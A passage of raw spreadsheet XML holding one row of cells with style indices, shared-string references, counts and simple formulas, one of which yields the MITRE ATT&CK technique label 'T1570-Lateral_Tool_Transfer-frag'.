      </c>
      <c r="K93" s="81" t="s">
        <v>901</v>
      </c>
      <c r="L93" s="81" t="s">
        <v>1553</v>
      </c>
      <c r="M93" s="378" t="s">
        <v>252</v>
      </c>
      <c r="N93" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O93" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P93" s="91"/>
      <c r="Q93" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R93" s="92" t="s">
        <v>1027</v>
      </c>
      <c r="S93" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T93" s="92" t="s">
        <v>1462</v>
      </c>
      <c r="U93" s="94" t="s">
        <v>1554</v>
      </c>
      <c r="V93" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W93" s="96" t="s">
        <v>1555</v>
      </c>
      <c r="X93" s="97" t="s">
        <v>1556</v>
      </c>
      <c r="Y93" s="83" t="s">
        <v>1557</v>
      </c>
      <c r="Z93" s="188" t="s">
        <v>1558</v>
      </c>
      <c r="AA93" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB93" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC93" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD93" s="83"/>
      <c r="AE93" s="83"/>
      <c r="AF93" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG93" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH93" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI93" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ93" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK93" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL93" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM93" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN93" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO93" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP93" s="385" t="str">
        <f>M93&amp;"-frag"</f>
        <v>T1570-Lateral_Tool_Transfer-frag</v>
      </c>
      <c r="AQ93" s="358">
        <v>7</v>
      </c>
      <c r="AR93" s="100"/>
      <c r="AS93" s="100">
        <v>1</v>
      </c>
      <c r="AT93" s="100">
        <v>1</v>
      </c>
      <c r="AU93" s="100">
        <v>2</v>
      </c>
      <c r="AV93" s="92" t="s">
        <v>1559</v>
      </c>
      <c r="AW93" s="100">
        <v>1</v>
      </c>
      <c r="AX93" s="100">
        <v>1</v>
      </c>
      <c r="AY93" s="100">
        <v>1</v>
      </c>
      <c r="AZ93" s="100">
        <v>2</v>
      </c>
      <c r="BA93" s="381"/>
      <c r="BB93" s="101">
        <v>7</v>
      </c>
      <c r="BC93" s="102" t="s">
        <v>1825</v>
      </c>
      <c r="BD93" s="102">
        <v>2</v>
      </c>
      <c r="BE93" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF93" s="103">
        <v>1</v>
      </c>
      <c r="BG93" s="104">
        <v>2</v>
      </c>
      <c r="BH93" s="105">
        <v>3</v>
      </c>
      <c r="BI93" s="106" t="s">
        <v>1874</v>
      </c>
      <c r="BJ93" s="497">
        <v>2</v>
      </c>
      <c r="BK93" s="107" t="s">
        <v>1843</v>
      </c>
      <c r="BL93" s="107">
        <v>1</v>
      </c>
      <c r="BM93" s="108">
        <v>2</v>
      </c>
      <c r="BN93" s="109">
        <v>10</v>
      </c>
      <c r="BO93" s="110" t="s">
        <v>2055</v>
      </c>
      <c r="BP93" s="501">
        <v>4</v>
      </c>
      <c r="BQ93" s="111" t="s">
        <v>1983</v>
      </c>
      <c r="BR93" s="111">
        <v>2</v>
      </c>
      <c r="BS93" s="112">
        <v>2</v>
      </c>
      <c r="BT93" s="113">
        <v>7</v>
      </c>
      <c r="BU93" s="114" t="s">
        <v>1825</v>
      </c>
      <c r="BV93" s="503">
        <v>2</v>
      </c>
      <c r="BW93" s="115" t="s">
        <v>336</v>
      </c>
      <c r="BX93" s="115">
        <v>1</v>
      </c>
      <c r="BY93" s="116">
        <v>2</v>
      </c>
      <c r="BZ93" s="250">
        <v>32</v>
      </c>
      <c r="CA93" s="251" t="s">
        <v>3816</v>
      </c>
      <c r="CB93" s="505">
        <v>21</v>
      </c>
      <c r="CC93" s="252" t="s">
        <v>3817</v>
      </c>
      <c r="CD93" s="252">
        <v>18</v>
      </c>
      <c r="CE93" s="253">
        <v>2</v>
      </c>
      <c r="CF93" s="101">
        <v>39</v>
      </c>
      <c r="CG93" s="102" t="s">
        <v>3818</v>
      </c>
      <c r="CH93" s="102">
        <v>23</v>
      </c>
      <c r="CI93" s="103" t="s">
        <v>3819</v>
      </c>
      <c r="CJ93" s="103">
        <v>19</v>
      </c>
      <c r="CK93" s="104">
        <v>2</v>
      </c>
      <c r="CL93" s="105">
        <v>0</v>
      </c>
      <c r="CM93" s="106">
        <v>0</v>
      </c>
      <c r="CN93" s="497">
        <v>0</v>
      </c>
      <c r="CO93" s="107">
        <v>0</v>
      </c>
      <c r="CP93" s="107">
        <v>0</v>
      </c>
      <c r="CQ93" s="108">
        <v>0</v>
      </c>
      <c r="CR93" s="109">
        <v>0</v>
      </c>
      <c r="CS93" s="110">
        <v>0</v>
      </c>
      <c r="CT93" s="501">
        <v>0</v>
      </c>
      <c r="CU93" s="111">
        <v>0</v>
      </c>
      <c r="CV93" s="111">
        <v>0</v>
      </c>
      <c r="CW93" s="112">
        <v>0</v>
      </c>
      <c r="CX93" s="113">
        <v>10</v>
      </c>
      <c r="CY93" s="114" t="s">
        <v>2055</v>
      </c>
      <c r="CZ93" s="503">
        <v>4</v>
      </c>
      <c r="DA93" s="115" t="s">
        <v>1983</v>
      </c>
      <c r="DB93" s="115">
        <v>2</v>
      </c>
      <c r="DC93" s="116">
        <v>2</v>
      </c>
      <c r="DD93" s="101">
        <v>0</v>
      </c>
      <c r="DE93" s="102">
        <v>0</v>
      </c>
      <c r="DF93" s="102">
        <v>0</v>
      </c>
      <c r="DG93" s="103">
        <v>0</v>
      </c>
      <c r="DH93" s="103">
        <v>0</v>
      </c>
      <c r="DI93" s="104">
        <v>0</v>
      </c>
      <c r="DJ93" s="105">
        <v>3</v>
      </c>
      <c r="DK93" s="106" t="s">
        <v>1874</v>
      </c>
      <c r="DL93" s="497">
        <v>2</v>
      </c>
      <c r="DM93" s="107" t="s">
        <v>1843</v>
      </c>
      <c r="DN93" s="107">
        <v>1</v>
      </c>
      <c r="DO93" s="108">
        <v>2</v>
      </c>
      <c r="DP93" s="109">
        <v>3</v>
      </c>
      <c r="DQ93" s="110" t="s">
        <v>1874</v>
      </c>
      <c r="DR93" s="501">
        <v>2</v>
      </c>
      <c r="DS93" s="111" t="s">
        <v>1843</v>
      </c>
      <c r="DT93" s="111">
        <v>1</v>
      </c>
      <c r="DU93" s="112">
        <v>2</v>
      </c>
      <c r="DV93" s="113">
        <v>0</v>
      </c>
      <c r="DW93" s="114">
        <v>0</v>
      </c>
      <c r="DX93" s="503">
        <v>0</v>
      </c>
      <c r="DY93" s="115">
        <v>0</v>
      </c>
      <c r="DZ93" s="115">
        <v>0</v>
      </c>
      <c r="EA93" s="116">
        <v>0</v>
      </c>
      <c r="EB93" s="250">
        <v>3</v>
      </c>
      <c r="EC93" s="251" t="s">
        <v>1874</v>
      </c>
      <c r="ED93" s="505">
        <v>2</v>
      </c>
      <c r="EE93" s="252" t="s">
        <v>1843</v>
      </c>
      <c r="EF93" s="252">
        <v>1</v>
      </c>
      <c r="EG93" s="253">
        <v>2</v>
      </c>
      <c r="EH93" s="101">
        <v>3</v>
      </c>
      <c r="EI93" s="102" t="s">
        <v>1874</v>
      </c>
      <c r="EJ93" s="102">
        <v>2</v>
      </c>
      <c r="EK93" s="103" t="s">
        <v>1843</v>
      </c>
      <c r="EL93" s="103">
        <v>1</v>
      </c>
      <c r="EM93" s="104">
        <v>2</v>
      </c>
      <c r="EN93" s="105">
        <v>0</v>
      </c>
      <c r="EO93" s="106">
        <v>0</v>
      </c>
      <c r="EP93" s="497">
        <v>0</v>
      </c>
      <c r="EQ93" s="107">
        <v>0</v>
      </c>
      <c r="ER93" s="107">
        <v>0</v>
      </c>
      <c r="ES93" s="108">
        <v>0</v>
      </c>
      <c r="ET93" s="109">
        <v>0</v>
      </c>
      <c r="EU93" s="110">
        <v>0</v>
      </c>
      <c r="EV93" s="501">
        <v>0</v>
      </c>
      <c r="EW93" s="111">
        <v>0</v>
      </c>
      <c r="EX93" s="111">
        <v>0</v>
      </c>
      <c r="EY93" s="112">
        <v>0</v>
      </c>
      <c r="EZ93" s="113">
        <v>3</v>
      </c>
      <c r="FA93" s="114" t="s">
        <v>1874</v>
      </c>
      <c r="FB93" s="503">
        <v>2</v>
      </c>
      <c r="FC93" s="115" t="s">
        <v>1843</v>
      </c>
      <c r="FD93" s="115">
        <v>1</v>
      </c>
      <c r="FE93" s="116">
        <v>2</v>
      </c>
      <c r="FF93" s="101">
        <v>7</v>
      </c>
      <c r="FG93" s="102" t="s">
        <v>1825</v>
      </c>
      <c r="FH93" s="102">
        <v>2</v>
      </c>
      <c r="FI93" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ93" s="103">
        <v>1</v>
      </c>
      <c r="FK93" s="104">
        <v>2</v>
      </c>
      <c r="FL93" s="105">
        <v>0</v>
      </c>
      <c r="FM93" s="106">
        <v>0</v>
      </c>
      <c r="FN93" s="497">
        <v>0</v>
      </c>
      <c r="FO93" s="107">
        <v>0</v>
      </c>
      <c r="FP93" s="107">
        <v>0</v>
      </c>
      <c r="FQ93" s="108">
        <v>0</v>
      </c>
      <c r="FR93" s="109">
        <v>7</v>
      </c>
      <c r="FS93" s="110" t="s">
        <v>1825</v>
      </c>
      <c r="FT93" s="501">
        <v>2</v>
      </c>
      <c r="FU93" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV93" s="111">
        <v>1</v>
      </c>
      <c r="FW93" s="112">
        <v>2</v>
      </c>
      <c r="FX93" s="113">
        <v>7</v>
      </c>
      <c r="FY93" s="114" t="s">
        <v>1825</v>
      </c>
      <c r="FZ93" s="503">
        <v>2</v>
      </c>
      <c r="GA93" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB93" s="115">
        <v>1</v>
      </c>
      <c r="GC93" s="116">
        <v>2</v>
      </c>
      <c r="GD93" s="250">
        <v>10</v>
      </c>
      <c r="GE93" s="251" t="s">
        <v>1923</v>
      </c>
      <c r="GF93" s="505">
        <v>4</v>
      </c>
      <c r="GG93" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH93" s="252">
        <v>2</v>
      </c>
      <c r="GI93" s="253">
        <v>2</v>
      </c>
      <c r="GJ93" s="101">
        <v>17</v>
      </c>
      <c r="GK93" s="102" t="s">
        <v>3820</v>
      </c>
      <c r="GL93" s="102">
        <v>6</v>
      </c>
      <c r="GM93" s="103" t="s">
        <v>2565</v>
      </c>
      <c r="GN93" s="103">
        <v>3</v>
      </c>
      <c r="GO93" s="104">
        <v>2</v>
      </c>
      <c r="GP93" s="105">
        <v>0</v>
      </c>
      <c r="GQ93" s="106">
        <v>0</v>
      </c>
      <c r="GR93" s="497">
        <v>0</v>
      </c>
      <c r="GS93" s="107">
        <v>0</v>
      </c>
      <c r="GT93" s="107">
        <v>0</v>
      </c>
      <c r="GU93" s="108">
        <v>0</v>
      </c>
      <c r="GV93" s="109">
        <v>0</v>
      </c>
      <c r="GW93" s="110">
        <v>0</v>
      </c>
      <c r="GX93" s="501">
        <v>0</v>
      </c>
      <c r="GY93" s="111">
        <v>0</v>
      </c>
      <c r="GZ93" s="111">
        <v>0</v>
      </c>
      <c r="HA93" s="112">
        <v>0</v>
      </c>
      <c r="HB93" s="113">
        <v>7</v>
      </c>
      <c r="HC93" s="114" t="s">
        <v>1825</v>
      </c>
      <c r="HD93" s="503">
        <v>2</v>
      </c>
      <c r="HE93" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF93" s="115">
        <v>1</v>
      </c>
      <c r="HG93" s="116">
        <v>2</v>
      </c>
      <c r="HH93" s="101">
        <v>0</v>
      </c>
      <c r="HI93" s="102">
        <v>0</v>
      </c>
      <c r="HJ93" s="102">
        <v>0</v>
      </c>
      <c r="HK93" s="103">
        <v>0</v>
      </c>
      <c r="HL93" s="103">
        <v>0</v>
      </c>
      <c r="HM93" s="104">
        <v>0</v>
      </c>
      <c r="HN93" s="105">
        <v>0</v>
      </c>
      <c r="HO93" s="106">
        <v>0</v>
      </c>
      <c r="HP93" s="497">
        <v>0</v>
      </c>
      <c r="HQ93" s="107">
        <v>0</v>
      </c>
      <c r="HR93" s="107">
        <v>0</v>
      </c>
      <c r="HS93" s="108">
        <v>0</v>
      </c>
      <c r="HT93" s="109">
        <v>0</v>
      </c>
      <c r="HU93" s="110">
        <v>0</v>
      </c>
      <c r="HV93" s="501">
        <v>0</v>
      </c>
      <c r="HW93" s="111">
        <v>0</v>
      </c>
      <c r="HX93" s="111">
        <v>0</v>
      </c>
      <c r="HY93" s="112">
        <v>0</v>
      </c>
      <c r="HZ93" s="113">
        <v>0</v>
      </c>
      <c r="IA93" s="114">
        <v>0</v>
      </c>
      <c r="IB93" s="503">
        <v>0</v>
      </c>
      <c r="IC93" s="115">
        <v>0</v>
      </c>
      <c r="ID93" s="115">
        <v>0</v>
      </c>
      <c r="IE93" s="116">
        <v>0</v>
      </c>
      <c r="IF93" s="250">
        <v>19</v>
      </c>
      <c r="IG93" s="251" t="s">
        <v>3821</v>
      </c>
      <c r="IH93" s="505">
        <v>15</v>
      </c>
      <c r="II93" s="252" t="s">
        <v>3822</v>
      </c>
      <c r="IJ93" s="252">
        <v>15</v>
      </c>
      <c r="IK93" s="253">
        <v>1</v>
      </c>
      <c r="IL93" s="101">
        <v>19</v>
      </c>
      <c r="IM93" s="102" t="s">
        <v>3821</v>
      </c>
      <c r="IN93" s="102">
        <v>15</v>
      </c>
      <c r="IO93" s="103" t="s">
        <v>3822</v>
      </c>
      <c r="IP93" s="103">
        <v>15</v>
      </c>
      <c r="IQ93" s="104">
        <v>1</v>
      </c>
      <c r="IR93" s="105">
        <v>0</v>
      </c>
      <c r="IS93" s="106">
        <v>0</v>
      </c>
      <c r="IT93" s="497">
        <v>0</v>
      </c>
      <c r="IU93" s="107">
        <v>0</v>
      </c>
      <c r="IV93" s="107">
        <v>0</v>
      </c>
      <c r="IW93" s="108">
        <v>0</v>
      </c>
      <c r="IX93" s="109">
        <v>0</v>
      </c>
      <c r="IY93" s="110">
        <v>0</v>
      </c>
      <c r="IZ93" s="501">
        <v>0</v>
      </c>
      <c r="JA93" s="111">
        <v>0</v>
      </c>
      <c r="JB93" s="111">
        <v>0</v>
      </c>
      <c r="JC93" s="112">
        <v>0</v>
      </c>
      <c r="JD93" s="113">
        <v>0</v>
      </c>
      <c r="JE93" s="114">
        <v>0</v>
      </c>
      <c r="JF93" s="503">
        <v>0</v>
      </c>
      <c r="JG93" s="115">
        <v>0</v>
      </c>
      <c r="JH93" s="115">
        <v>0</v>
      </c>
      <c r="JI93" s="116">
        <v>0</v>
      </c>
      <c r="JJ93" s="101">
        <v>0</v>
      </c>
      <c r="JK93" s="102">
        <v>0</v>
      </c>
      <c r="JL93" s="102">
        <v>0</v>
      </c>
      <c r="JM93" s="103">
        <v>0</v>
      </c>
      <c r="JN93" s="103">
        <v>0</v>
      </c>
      <c r="JO93" s="104">
        <v>0</v>
      </c>
      <c r="JP93" s="105">
        <v>0</v>
      </c>
      <c r="JQ93" s="106">
        <v>0</v>
      </c>
      <c r="JR93" s="497">
        <v>0</v>
      </c>
      <c r="JS93" s="107">
        <v>0</v>
      </c>
      <c r="JT93" s="107">
        <v>0</v>
      </c>
      <c r="JU93" s="108">
        <v>0</v>
      </c>
      <c r="JV93" s="109">
        <v>0</v>
      </c>
      <c r="JW93" s="110">
        <v>0</v>
      </c>
      <c r="JX93" s="501">
        <v>0</v>
      </c>
      <c r="JY93" s="111">
        <v>0</v>
      </c>
      <c r="JZ93" s="111">
        <v>0</v>
      </c>
      <c r="KA93" s="112">
        <v>0</v>
      </c>
      <c r="KB93" s="113">
        <v>0</v>
      </c>
      <c r="KC93" s="114">
        <v>0</v>
      </c>
      <c r="KD93" s="503">
        <v>0</v>
      </c>
      <c r="KE93" s="115">
        <v>0</v>
      </c>
      <c r="KF93" s="115">
        <v>0</v>
      </c>
      <c r="KG93" s="116">
        <v>0</v>
      </c>
      <c r="KH93" s="250">
        <v>0</v>
      </c>
      <c r="KI93" s="251">
        <v>0</v>
      </c>
      <c r="KJ93" s="505">
        <v>0</v>
      </c>
      <c r="KK93" s="252">
        <v>0</v>
      </c>
      <c r="KL93" s="252">
        <v>0</v>
      </c>
      <c r="KM93" s="253">
        <v>0</v>
      </c>
      <c r="KN93" s="101">
        <v>0</v>
      </c>
      <c r="KO93" s="102">
        <v>0</v>
      </c>
      <c r="KP93" s="102">
        <v>0</v>
      </c>
      <c r="KQ93" s="103">
        <v>0</v>
      </c>
      <c r="KR93" s="103">
        <v>0</v>
      </c>
      <c r="KS93" s="104">
        <v>0</v>
      </c>
      <c r="KT93" s="105">
        <v>0</v>
      </c>
      <c r="KU93" s="106">
        <v>0</v>
      </c>
      <c r="KV93" s="497">
        <v>0</v>
      </c>
      <c r="KW93" s="107">
        <v>0</v>
      </c>
      <c r="KX93" s="107">
        <v>0</v>
      </c>
      <c r="KY93" s="108">
        <v>0</v>
      </c>
      <c r="KZ93" s="109">
        <v>0</v>
      </c>
      <c r="LA93" s="110">
        <v>0</v>
      </c>
      <c r="LB93" s="501">
        <v>0</v>
      </c>
      <c r="LC93" s="111">
        <v>0</v>
      </c>
      <c r="LD93" s="111">
        <v>0</v>
      </c>
      <c r="LE93" s="112">
        <v>0</v>
      </c>
      <c r="LF93" s="113">
        <v>0</v>
      </c>
      <c r="LG93" s="114">
        <v>0</v>
      </c>
      <c r="LH93" s="503">
        <v>0</v>
      </c>
      <c r="LI93" s="115">
        <v>0</v>
      </c>
      <c r="LJ93" s="115">
        <v>0</v>
      </c>
      <c r="LK93" s="116">
        <v>0</v>
      </c>
      <c r="LL93" s="117">
        <v>2</v>
      </c>
      <c r="LM93" s="507">
        <v>1</v>
      </c>
      <c r="LN93" s="119">
        <v>1</v>
      </c>
      <c r="LO93" s="119">
        <v>0</v>
      </c>
      <c r="LP93" s="119">
        <v>1</v>
      </c>
      <c r="LQ93" s="119">
        <v>1</v>
      </c>
      <c r="LR93" s="119">
        <v>0</v>
      </c>
      <c r="LS93" s="119">
        <v>1</v>
      </c>
      <c r="LT93" s="382"/>
      <c r="LU93" s="117">
        <v>0</v>
      </c>
      <c r="LV93" s="118">
        <v>0</v>
      </c>
      <c r="LW93" s="507">
        <v>0</v>
      </c>
      <c r="LX93" s="119">
        <v>0</v>
      </c>
      <c r="LY93" s="119">
        <v>0</v>
      </c>
      <c r="LZ93" s="119">
        <v>0</v>
      </c>
      <c r="MA93" s="117">
        <v>0</v>
      </c>
      <c r="MB93" s="118">
        <v>0</v>
      </c>
      <c r="MC93" s="507">
        <v>0</v>
      </c>
      <c r="MD93" s="119">
        <v>0</v>
      </c>
      <c r="ME93" s="119">
        <v>0</v>
      </c>
      <c r="MF93" s="119">
        <v>0</v>
      </c>
      <c r="MG93" s="117">
        <v>0</v>
      </c>
      <c r="MH93" s="118">
        <v>0</v>
      </c>
      <c r="MI93" s="507">
        <v>0</v>
      </c>
      <c r="MJ93" s="119">
        <v>0</v>
      </c>
      <c r="MK93" s="119">
        <v>0</v>
      </c>
      <c r="ML93" s="119">
        <v>0</v>
      </c>
      <c r="MM93" s="117">
        <v>0</v>
      </c>
      <c r="MN93" s="118">
        <v>0</v>
      </c>
      <c r="MO93" s="507">
        <v>0</v>
      </c>
      <c r="MP93" s="119">
        <v>0</v>
      </c>
      <c r="MQ93" s="119">
        <v>0</v>
      </c>
      <c r="MR93" s="119">
        <v>0</v>
      </c>
      <c r="MS93" s="117">
        <v>2</v>
      </c>
      <c r="MT93" s="118" t="s">
        <v>4237</v>
      </c>
      <c r="MU93" s="507">
        <v>1</v>
      </c>
      <c r="MV93" s="119" t="s">
        <v>2658</v>
      </c>
      <c r="MW93" s="119">
        <v>1</v>
      </c>
      <c r="MX93" s="119">
        <v>1</v>
      </c>
      <c r="MY93" s="117">
        <v>0</v>
      </c>
      <c r="MZ93" s="118">
        <v>0</v>
      </c>
      <c r="NA93" s="507">
        <v>0</v>
      </c>
      <c r="NB93" s="119">
        <v>0</v>
      </c>
      <c r="NC93" s="119">
        <v>0</v>
      </c>
      <c r="ND93" s="119">
        <v>0</v>
      </c>
      <c r="NE93" s="117">
        <v>0</v>
      </c>
      <c r="NF93" s="118">
        <v>0</v>
      </c>
      <c r="NG93" s="507">
        <v>0</v>
      </c>
      <c r="NH93" s="119">
        <v>0</v>
      </c>
      <c r="NI93" s="119">
        <v>0</v>
      </c>
      <c r="NJ93" s="119">
        <v>0</v>
      </c>
      <c r="NK93" s="117">
        <v>0</v>
      </c>
      <c r="NL93" s="118">
        <v>0</v>
      </c>
      <c r="NM93" s="507">
        <v>0</v>
      </c>
      <c r="NN93" s="119">
        <v>0</v>
      </c>
      <c r="NO93" s="119">
        <v>0</v>
      </c>
      <c r="NP93" s="119">
        <v>0</v>
      </c>
      <c r="NQ93" s="117">
        <v>0</v>
      </c>
      <c r="NR93" s="118">
        <v>0</v>
      </c>
      <c r="NS93" s="507">
        <v>0</v>
      </c>
      <c r="NT93" s="119">
        <v>0</v>
      </c>
      <c r="NU93" s="119">
        <v>0</v>
      </c>
      <c r="NV93" s="119">
        <v>0</v>
      </c>
      <c r="NW93" s="117">
        <v>0</v>
      </c>
      <c r="NX93" s="118">
        <v>0</v>
      </c>
      <c r="NY93" s="507">
        <v>0</v>
      </c>
      <c r="NZ93" s="119">
        <v>0</v>
      </c>
      <c r="OA93" s="119">
        <v>0</v>
      </c>
      <c r="OB93" s="119">
        <v>0</v>
      </c>
      <c r="OC93" s="120">
        <v>0</v>
      </c>
      <c r="OD93" s="120">
        <v>0</v>
      </c>
      <c r="OE93" s="120">
        <v>0</v>
      </c>
      <c r="OF93" s="121">
        <v>0</v>
      </c>
      <c r="OG93" s="120">
        <v>0</v>
      </c>
      <c r="OH93" s="120">
        <v>0</v>
      </c>
      <c r="OI93" s="120">
        <v>0</v>
      </c>
      <c r="OJ93" s="120">
        <v>0</v>
      </c>
      <c r="OK93" s="383"/>
      <c r="OL93" s="120">
        <v>0</v>
      </c>
      <c r="OM93" s="120">
        <v>0</v>
      </c>
      <c r="ON93" s="120">
        <v>0</v>
      </c>
      <c r="OO93" s="195"/>
      <c r="OP93" s="195">
        <v>0</v>
      </c>
      <c r="OQ93" s="464">
        <v>0</v>
      </c>
      <c r="OR93" s="120">
        <v>0</v>
      </c>
      <c r="OS93" s="120">
        <v>0</v>
      </c>
      <c r="OT93" s="120">
        <v>0</v>
      </c>
      <c r="OU93" s="195"/>
      <c r="OV93" s="195">
        <v>0</v>
      </c>
      <c r="OW93" s="464">
        <v>0</v>
      </c>
      <c r="OX93" s="120">
        <v>0</v>
      </c>
      <c r="OY93" s="120">
        <v>0</v>
      </c>
      <c r="OZ93" s="120">
        <v>0</v>
      </c>
      <c r="PA93" s="195"/>
      <c r="PB93" s="195">
        <v>0</v>
      </c>
      <c r="PC93" s="464">
        <v>0</v>
      </c>
      <c r="PD93" s="120">
        <v>0</v>
      </c>
      <c r="PE93" s="120">
        <v>0</v>
      </c>
      <c r="PF93" s="120">
        <v>0</v>
      </c>
      <c r="PG93" s="195"/>
      <c r="PH93" s="195">
        <v>0</v>
      </c>
      <c r="PI93" s="464">
        <v>0</v>
      </c>
      <c r="PJ93" s="120">
        <v>0</v>
      </c>
      <c r="PK93" s="120">
        <v>0</v>
      </c>
      <c r="PL93" s="120">
        <v>0</v>
      </c>
      <c r="PM93" s="195"/>
      <c r="PN93" s="195">
        <v>0</v>
      </c>
      <c r="PO93" s="464">
        <v>0</v>
      </c>
      <c r="PP93" s="120">
        <v>0</v>
      </c>
      <c r="PQ93" s="120">
        <v>0</v>
      </c>
      <c r="PR93" s="120">
        <v>0</v>
      </c>
      <c r="PS93" s="195"/>
      <c r="PT93" s="195">
        <v>0</v>
      </c>
      <c r="PU93" s="464">
        <v>0</v>
      </c>
      <c r="PV93" s="120">
        <v>0</v>
      </c>
      <c r="PW93" s="120">
        <v>0</v>
      </c>
      <c r="PX93" s="120">
        <v>0</v>
      </c>
      <c r="PY93" s="195"/>
      <c r="PZ93" s="195">
        <v>0</v>
      </c>
      <c r="QA93" s="464">
        <v>0</v>
      </c>
      <c r="QB93" s="120">
        <v>0</v>
      </c>
      <c r="QC93" s="120">
        <v>0</v>
      </c>
      <c r="QD93" s="120">
        <v>0</v>
      </c>
      <c r="QE93" s="195"/>
      <c r="QF93" s="195">
        <v>0</v>
      </c>
      <c r="QG93" s="464">
        <v>0</v>
      </c>
      <c r="QH93" s="120">
        <v>0</v>
      </c>
      <c r="QI93" s="120">
        <v>0</v>
      </c>
      <c r="QJ93" s="120">
        <v>0</v>
      </c>
      <c r="QK93" s="195"/>
      <c r="QL93" s="195">
        <v>0</v>
      </c>
      <c r="QM93" s="464">
        <v>0</v>
      </c>
      <c r="QN93" s="120">
        <v>0</v>
      </c>
      <c r="QO93" s="120">
        <v>0</v>
      </c>
      <c r="QP93" s="120">
        <v>0</v>
      </c>
      <c r="QQ93" s="195"/>
      <c r="QR93" s="195">
        <v>0</v>
      </c>
      <c r="QS93" s="464">
        <v>0</v>
      </c>
      <c r="QT93" s="184"/>
      <c r="QU93" s="184"/>
      <c r="QV93" s="184"/>
      <c r="QW93" s="184"/>
      <c r="QX93" s="184"/>
      <c r="QY93" s="184"/>
      <c r="QZ93" s="184"/>
      <c r="RA93" s="184"/>
      <c r="RB93" s="184"/>
      <c r="RC93" s="184"/>
      <c r="RD93" s="184"/>
      <c r="RE93" s="184"/>
      <c r="RF93" s="184"/>
      <c r="RG93" s="184"/>
      <c r="RH93" s="184"/>
      <c r="RI93" s="184"/>
      <c r="RJ93" s="184"/>
      <c r="RK93" s="184"/>
      <c r="RL93" s="184"/>
      <c r="RM93" s="184"/>
      <c r="RN93" s="184"/>
      <c r="RO93" s="184"/>
      <c r="RP93" s="184"/>
      <c r="RQ93" s="184"/>
      <c r="RR93" s="184"/>
      <c r="RS93" s="184"/>
      <c r="RT93" s="184"/>
      <c r="RU93" s="184"/>
      <c r="RV93" s="184"/>
      <c r="RW93" s="184"/>
      <c r="RX93" s="184"/>
      <c r="RY93" s="184"/>
      <c r="RZ93" s="184"/>
      <c r="SA93" s="184"/>
      <c r="SB93" s="184"/>
      <c r="SC93" s="184"/>
      <c r="SD93" s="184"/>
      <c r="SE93" s="184"/>
      <c r="SF93" s="184"/>
      <c r="SG93" s="184"/>
      <c r="SH93" s="184"/>
      <c r="SI93" s="184"/>
      <c r="SJ93" s="184"/>
      <c r="SK93" s="184"/>
      <c r="SL93" s="184"/>
      <c r="SM93" s="184"/>
      <c r="SN93" s="184"/>
      <c r="SO93" s="184"/>
      <c r="SP93" s="184"/>
      <c r="SQ93" s="184"/>
      <c r="SR93" s="184"/>
      <c r="SS93" s="184"/>
      <c r="ST93" s="184"/>
      <c r="SU93" s="184"/>
      <c r="SV93" s="184"/>
      <c r="SW93" s="184"/>
      <c r="SX93" s="184"/>
      <c r="SY93" s="184"/>
      <c r="SZ93" s="184"/>
      <c r="TA93" s="184"/>
      <c r="TB93" s="184"/>
      <c r="TC93" s="184"/>
      <c r="TD93" s="184"/>
      <c r="TE93" s="184"/>
      <c r="TF93" s="184"/>
      <c r="TG93" s="184"/>
      <c r="TH93" s="184"/>
      <c r="TI93" s="184"/>
      <c r="TJ93" s="184"/>
      <c r="TK93" s="184"/>
      <c r="TL93" s="184"/>
      <c r="TM93" s="184"/>
      <c r="TN93" s="184"/>
      <c r="TO93" s="184"/>
      <c r="TP93" s="184"/>
      <c r="TQ93" s="184"/>
      <c r="TR93" s="184"/>
      <c r="TS93" s="184"/>
      <c r="TT93" s="184"/>
      <c r="TU93" s="184"/>
      <c r="TV93" s="184"/>
      <c r="TW93" s="184"/>
      <c r="TX93" s="184"/>
      <c r="TY93" s="184"/>
      <c r="TZ93" s="184"/>
      <c r="UA93" s="184"/>
      <c r="UB93" s="184"/>
      <c r="UC93" s="184"/>
      <c r="UD93" s="184"/>
      <c r="UE93" s="184"/>
      <c r="UF93" s="184"/>
      <c r="UG93" s="184"/>
      <c r="UH93" s="184"/>
      <c r="UI93" s="184"/>
      <c r="UJ93" s="184"/>
      <c r="UK93" s="184"/>
      <c r="UL93" s="184"/>
      <c r="UM93" s="184"/>
      <c r="UN93" s="184"/>
      <c r="UO93" s="184"/>
      <c r="UP93" s="184"/>
      <c r="UQ93" s="184"/>
      <c r="UR93" s="184"/>
      <c r="US93" s="184"/>
      <c r="UT93" s="184"/>
      <c r="UU93" s="184"/>
      <c r="UV93" s="184"/>
      <c r="UW93" s="184"/>
      <c r="UX93" s="184"/>
      <c r="UY93" s="184"/>
      <c r="UZ93" s="184"/>
      <c r="VA93" s="184"/>
      <c r="VB93" s="184"/>
      <c r="VC93" s="184"/>
      <c r="VD93" s="184"/>
      <c r="VE93" s="184"/>
      <c r="VF93" s="184"/>
      <c r="VG93" s="184"/>
      <c r="VH93" s="184"/>
      <c r="VI93" s="184"/>
      <c r="VJ93" s="184"/>
      <c r="VK93" s="184"/>
      <c r="VL93" s="184"/>
      <c r="VM93" s="184"/>
      <c r="VN93" s="184"/>
      <c r="VO93" s="184"/>
      <c r="VP93" s="184"/>
      <c r="VQ93" s="184"/>
      <c r="VR93" s="184"/>
      <c r="VS93" s="184"/>
      <c r="VT93" s="184"/>
      <c r="VU93" s="184"/>
